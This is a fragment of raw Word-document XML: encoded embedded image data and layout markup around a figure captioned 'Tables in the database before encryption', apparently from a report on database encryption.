hiErAs2MAIMk&#10;DAr134KfGj4fN+z74a1weOvDR0TR9JsLPUtS/te3+zWM/kRL5U0m/bG+WUbWIOSOOap25qsP5XH8&#10;eb7tl96+eL5lKn5qX4cv37v7ma/7OvxC174mfDiTVfEv9nNrFtrOqaVNJpVtJb28otL6a2WRY5JZ&#10;WTcsQYgu2CTzVjwX4s8aat8Y/iNoetaNb2fg7SY9NbQNSjtZ45L1pYXa5DSMfLk2OqgeWBtzhsk1&#10;5j+xB8TPB/irwHrejaL4r0PWNXj8S+IL99PsNRhnuFtpNXuWjmMaMWEbK6FXxgh1IPIr6Uq5aO/d&#10;f5FJ/FFd3+f+X4BXmvxe+Juo/CW88Pa7eWtvP4CluBYa5dKrfadNeZ0S2u87tptw5KSjG5fMRwdq&#10;OC7xP8evDnhH42eDvhfqNvqSa/4rs7q7026S2Bs2+zqWkjaTdkPtBbAUjGMkEqDnftaTWUP7MfxR&#10;F+glhm8O3sCRbdxkmkhZIlUd2MjIABzkisZScIe1SutfnZtNfg16msIqc/ZSdr217X2f6nrHXkUt&#10;ZHhG3u7XwnosF+Sb6OygS4z18wRqG/XNa9azjyycb3sYQlzwUmrXCiiio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4DQPhP&#10;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&#10;d7637676g9b36/1/wPQKKKK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V4X+zHqUfg1fEfwi1Em213wlfXE9pHIpX7b&#10;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&#10;m7+evkDu1JPq7/jzWXo7W8lbqXK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8c14n+yfbrrfgXV/H90BJr&#10;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&#10;UUUUi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BQABgAIAAAAIQAyTI7B3gAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9Ba8JAEIXvhf6HZQq9&#10;1U2MSk2zEZG2JymoheJtzI5JMDsbsmsS/323vbSXgcd7vPdNthpNI3rqXG1ZQTyJQBAXVtdcKvg8&#10;vD09g3AeWWNjmRTcyMEqv7/LMNV24B31e1+KUMIuRQWV920qpSsqMugmtiUO3tl2Bn2QXSl1h0Mo&#10;N42cRtFCGqw5LFTY0qai4rK/GgXvAw7rJH7tt5fz5nY8zD++tjEp9fgwrl9AeBr9Xxh+8AM65IHp&#10;ZK+snWgUhEf87w3eMllMQZwUJLPZHG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VDdfpVBAAAlA8AAA4AAAAAAAAAAAAAAAAAPQIAAGRycy9lMm9Eb2Mu&#10;eG1sUEsBAi0ACgAAAAAAAAAhAHalccLa6AAA2ugAABQAAAAAAAAAAAAAAAAAvgYAAGRycy9tZWRp&#10;YS9pbWFnZTEuanBnUEsBAi0AFAAGAAgAAAAhADJMjsHeAAAABQEAAA8AAAAAAAAAAAAAAAAAyu8A&#10;AGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3ncEYugAAACEBAAAZAAAAAAAAAAAAAAAA&#10;ANXwAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAAMbxAAAAAA==&#10;">
                <v:rect id="Rectangle 5651" o:spid="_x0000_s1333" style="position:absolute;width:51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49BC1F6D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5652" o:spid="_x0000_s1334" style="position:absolute;top:1859;width:3568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338AF5E0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                          </w:rPr>
                          <w:t>Tables in the database before encryption</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5653" o:spid="_x0000_s1335" style="position:absolute;left:26828;top:1859;width:51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38900E80" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5654" o:spid="_x0000_s1336" style="position:absolute;left:59067;top:20501;width:5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68A36C36" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 5662" o:spid="_x0000_s1337" type="#_x0000_t75" style="position:absolute;left:192;top:3413;width:58738;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lJxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6Ed1UMEjqKkWQqNiDthdvj+xrsjX7NmZXjf76rlDwOMzMN8xk1tlanKn1xrGCt0EC&#10;grhw2nCp4Ptr0R+D8AFZY+2YFFzJw2z6/DTBTLsLb+m8C6WIEPYZKqhCaDIpfVGRRT9wDXH0flxr&#10;MUTZllK3eIlwW8thkqTSouG4UGFD84qKw+5kFZj8mPPaLD+L4+8mX91c75Dse0q9vnQf7yACdeER&#10;/m8vtYJRmg7h/iY+ATn9AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFqW6UnHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId116" o:title=""/>
                </v:shape>
                <v:shape id="Shape 5663" o:spid="_x0000_s1338" style="position:absolute;left:144;top:3366;width:58833;height:17920;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5883275,179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RdxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9bawIx&#10;FITfC/6HcATfataWLrIaRYXWvnoB2bfD5rgXNydLEnX9901B8HGYmW+Y+bI3rbiR87VlBZNxAoK4&#10;sLrmUsHx8P0+BeEDssbWMil4kIflYvA2x0zbO+/otg+liBD2GSqoQugyKX1RkUE/th1x9M7WGQxR&#10;ulJqh/cIN638SJJUGqw5LlTY0aai4rK/GgVNujk068eu+KFTGTDf5u7a5EqNhv1qBiJQH17hZ/tX&#10;K/hK00/4fxOfgFz8AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIyOBF3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,1791970r5883275,l5883275,,,,,1791970xe" filled="f">
                  <v:path arrowok="t" textboxrect="0,0,5883275,1791970"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB7B5B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B84261" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED74181" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F8C987" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6882BEAB" wp14:editId="7AD99636">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="46497" name="Group 4649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20" name="Shape 500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21" name="Shape 500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22" name="Shape 500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23" name="Shape 500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24" name="Shape 500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97" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50025" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
